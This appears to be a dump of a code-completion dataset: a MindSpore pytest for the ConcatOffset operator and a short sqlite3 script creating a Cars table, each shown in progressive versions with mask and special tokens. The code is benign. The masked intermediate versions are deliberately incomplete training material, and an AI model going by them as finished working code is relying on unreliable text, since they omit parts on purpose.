@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
def test_concat_offset():
    """
    Feature: aicpu ConcatOffset
    Description: test ConcatOffset on Ascend.
    Expectation: output compares success with expect.
    """
    context.set_context(device_target="Ascend")
    # Exercise both execution modes; PyNative returns a constant-folded value.
    run_case(context.GRAPH_MODE)
    run_case(context.PYNATIVE_MODE)
|
normal
|
{
"blob_id": "2064fe029bc7db14505a5b38750e324b55556abb",
"index": 7032,
"step-1": "<mask token>\n\n\nclass ConcatOffsetNet(nn.Cell):\n\n def __init__(self, axis):\n super(ConcatOffsetNet, self).__init__()\n self.op = G.ConcatOffset(2, axis)\n\n def construct(self, x0, x1):\n return self.op((x0, x1))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ConcatOffsetNet(nn.Cell):\n\n def __init__(self, axis):\n super(ConcatOffsetNet, self).__init__()\n self.op = G.ConcatOffset(2, axis)\n\n def construct(self, x0, x1):\n return self.op((x0, x1))\n\n\n<mask token>\n\n\n@pytest.mark.level0\n@pytest.mark.env_onecard\n@pytest.mark.platform_arm_ascend_training\n@pytest.mark.platform_x86_ascend_training\ndef test_concat_offset():\n \"\"\"\n Feature: aicpu ConcatOffset\n Description: test ConcatOffset on Ascend.\n Expectation: output compares success with expect.\n \"\"\"\n context.set_context(device_target='Ascend')\n run_case(context.GRAPH_MODE)\n run_case(context.PYNATIVE_MODE)\n",
"step-3": "<mask token>\n\n\nclass ConcatOffsetNet(nn.Cell):\n\n def __init__(self, axis):\n super(ConcatOffsetNet, self).__init__()\n self.op = G.ConcatOffset(2, axis)\n\n def construct(self, x0, x1):\n return self.op((x0, x1))\n\n\ndef run_case(run_mode):\n context.set_context(mode=run_mode)\n x0 = Tensor(np.random.uniform(10, 20, (4, 2, 16)).astype(np.float32))\n x1 = Tensor(np.random.uniform(10, 20, (4, 6, 16)).astype(np.float32))\n expect = np.array([[0, 0, 0], [0, 2, 0]]).astype(np.int64)\n x0_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)\n x1_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)\n net = ConcatOffsetNet(1)\n net.set_inputs(x0_dyn, x1_dyn)\n output = net(x0, x1)\n if run_mode == context.GRAPH_MODE:\n assert np.allclose(expect, output.asnumpy())\n else:\n assert np.allclose(expect, output)\n\n\n@pytest.mark.level0\n@pytest.mark.env_onecard\n@pytest.mark.platform_arm_ascend_training\n@pytest.mark.platform_x86_ascend_training\ndef test_concat_offset():\n \"\"\"\n Feature: aicpu ConcatOffset\n Description: test ConcatOffset on Ascend.\n Expectation: output compares success with expect.\n \"\"\"\n context.set_context(device_target='Ascend')\n run_case(context.GRAPH_MODE)\n run_case(context.PYNATIVE_MODE)\n",
"step-4": "import numpy as np\nimport pytest\nimport mindspore\nimport mindspore.nn as nn\nfrom mindspore.ops.operations import _grad_ops as G\nfrom mindspore import Tensor, context\n\n\nclass ConcatOffsetNet(nn.Cell):\n\n def __init__(self, axis):\n super(ConcatOffsetNet, self).__init__()\n self.op = G.ConcatOffset(2, axis)\n\n def construct(self, x0, x1):\n return self.op((x0, x1))\n\n\ndef run_case(run_mode):\n context.set_context(mode=run_mode)\n x0 = Tensor(np.random.uniform(10, 20, (4, 2, 16)).astype(np.float32))\n x1 = Tensor(np.random.uniform(10, 20, (4, 6, 16)).astype(np.float32))\n expect = np.array([[0, 0, 0], [0, 2, 0]]).astype(np.int64)\n x0_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)\n x1_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)\n net = ConcatOffsetNet(1)\n net.set_inputs(x0_dyn, x1_dyn)\n output = net(x0, x1)\n if run_mode == context.GRAPH_MODE:\n assert np.allclose(expect, output.asnumpy())\n else:\n assert np.allclose(expect, output)\n\n\n@pytest.mark.level0\n@pytest.mark.env_onecard\n@pytest.mark.platform_arm_ascend_training\n@pytest.mark.platform_x86_ascend_training\ndef test_concat_offset():\n \"\"\"\n Feature: aicpu ConcatOffset\n Description: test ConcatOffset on Ascend.\n Expectation: output compares success with expect.\n \"\"\"\n context.set_context(device_target='Ascend')\n run_case(context.GRAPH_MODE)\n run_case(context.PYNATIVE_MODE)\n",
"step-5": "# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\nimport numpy as np\nimport pytest\nimport mindspore\nimport mindspore.nn as nn\nfrom mindspore.ops.operations import _grad_ops as G\nfrom mindspore import Tensor, context\n\n\nclass ConcatOffsetNet(nn.Cell):\n def __init__(self, axis):\n super(ConcatOffsetNet, self).__init__()\n self.op = G.ConcatOffset(2, axis)\n\n def construct(self, x0, x1):\n return self.op((x0, x1))\n\n\ndef run_case(run_mode):\n context.set_context(mode=run_mode)\n x0 = Tensor(np.random.uniform(10, 20, (4, 2, 16)).astype(np.float32))\n x1 = Tensor(np.random.uniform(10, 20, (4, 6, 16)).astype(np.float32))\n expect = np.array([[0, 0, 0], [0, 2, 0]]).astype(np.int64)\n x0_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)\n x1_dyn = Tensor(shape=[None, None, 16], dtype=mindspore.float32)\n net = ConcatOffsetNet(1)\n net.set_inputs(x0_dyn, x1_dyn)\n output = net(x0, x1)\n if run_mode == context.GRAPH_MODE:\n assert np.allclose(expect, output.asnumpy())\n else:\n # In PyNative, set_inputs will be ignored. 
Static shape for ConcatOffset\n # infer output is not a tensor, get constant value output.\n assert np.allclose(expect, output)\n\n\n@pytest.mark.level0\n@pytest.mark.env_onecard\n@pytest.mark.platform_arm_ascend_training\n@pytest.mark.platform_x86_ascend_training\ndef test_concat_offset():\n \"\"\"\n Feature: aicpu ConcatOffset\n Description: test ConcatOffset on Ascend.\n Expectation: output compares success with expect.\n \"\"\"\n context.set_context(device_target=\"Ascend\")\n run_case(context.GRAPH_MODE)\n run_case(context.PYNATIVE_MODE)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with con:
cur = con.cursor()
cur.execute('CREATE TABLE Cars(Id INT, Name TEXT, Price INT)')
cur.execute("INSERT INTO Cars VALUES(1, 'car1', 10)")
cur.execute("INSERT INTO Cars VALUES(2, 'car2', 20)")
cur.execute("INSERT INTO Cars VALUES(3, 'car3', 30)")
<|reserved_special_token_1|>
<|reserved_special_token_0|>
con = lite.connect('test.db')
with con:
cur = con.cursor()
cur.execute('CREATE TABLE Cars(Id INT, Name TEXT, Price INT)')
cur.execute("INSERT INTO Cars VALUES(1, 'car1', 10)")
cur.execute("INSERT INTO Cars VALUES(2, 'car2', 20)")
cur.execute("INSERT INTO Cars VALUES(3, 'car3', 30)")
<|reserved_special_token_1|>
import sqlite3 as lite
import sys
con = lite.connect('test.db')
with con:
cur = con.cursor()
cur.execute('CREATE TABLE Cars(Id INT, Name TEXT, Price INT)')
cur.execute("INSERT INTO Cars VALUES(1, 'car1', 10)")
cur.execute("INSERT INTO Cars VALUES(2, 'car2', 20)")
cur.execute("INSERT INTO Cars VALUES(3, 'car3', 30)")
<|reserved_special_token_1|>
import sqlite3 as lite
import sys

# Populate test.db with a small Cars table.
con = lite.connect("test.db")

with con:
    cur = con.cursor()
    # Drop any previous table so the script is safely re-runnable
    # (a plain CREATE TABLE raises OperationalError on the second run).
    cur.execute("DROP TABLE IF EXISTS Cars")
    cur.execute("CREATE TABLE Cars(Id INT, Name TEXT, Price INT)")
    # Parameterized batch insert instead of three literal statements.
    cur.executemany(
        "INSERT INTO Cars VALUES(?, ?, ?)",
        [(1, "car1", 10), (2, "car2", 20), (3, "car3", 30)],
    )

# The with-block only commits/rolls back; close the connection explicitly.
con.close()
|
flexible
|
{
"blob_id": "db22e568c86f008c9882181f5c1d88d5bca28570",
"index": 5416,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith con:\n cur = con.cursor()\n cur.execute('CREATE TABLE Cars(Id INT, Name TEXT, Price INT)')\n cur.execute(\"INSERT INTO Cars VALUES(1, 'car1', 10)\")\n cur.execute(\"INSERT INTO Cars VALUES(2, 'car2', 20)\")\n cur.execute(\"INSERT INTO Cars VALUES(3, 'car3', 30)\")\n",
"step-3": "<mask token>\ncon = lite.connect('test.db')\nwith con:\n cur = con.cursor()\n cur.execute('CREATE TABLE Cars(Id INT, Name TEXT, Price INT)')\n cur.execute(\"INSERT INTO Cars VALUES(1, 'car1', 10)\")\n cur.execute(\"INSERT INTO Cars VALUES(2, 'car2', 20)\")\n cur.execute(\"INSERT INTO Cars VALUES(3, 'car3', 30)\")\n",
"step-4": "import sqlite3 as lite\nimport sys\ncon = lite.connect('test.db')\nwith con:\n cur = con.cursor()\n cur.execute('CREATE TABLE Cars(Id INT, Name TEXT, Price INT)')\n cur.execute(\"INSERT INTO Cars VALUES(1, 'car1', 10)\")\n cur.execute(\"INSERT INTO Cars VALUES(2, 'car2', 20)\")\n cur.execute(\"INSERT INTO Cars VALUES(3, 'car3', 30)\")\n",
"step-5": "import sqlite3 as lite\nimport sys\n\ncon = lite.connect(\"test.db\")\n\nwith con:\n\n cur = con.cursor()\n \n cur.execute('''CREATE TABLE Cars(Id INT, Name TEXT, Price INT)''')\n cur.execute('''INSERT INTO Cars VALUES(1, 'car1', 10)''')\n cur.execute('''INSERT INTO Cars VALUES(2, 'car2', 20)''')\n cur.execute('''INSERT INTO Cars VALUES(3, 'car3', 30)''')\n\n\n\n \n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.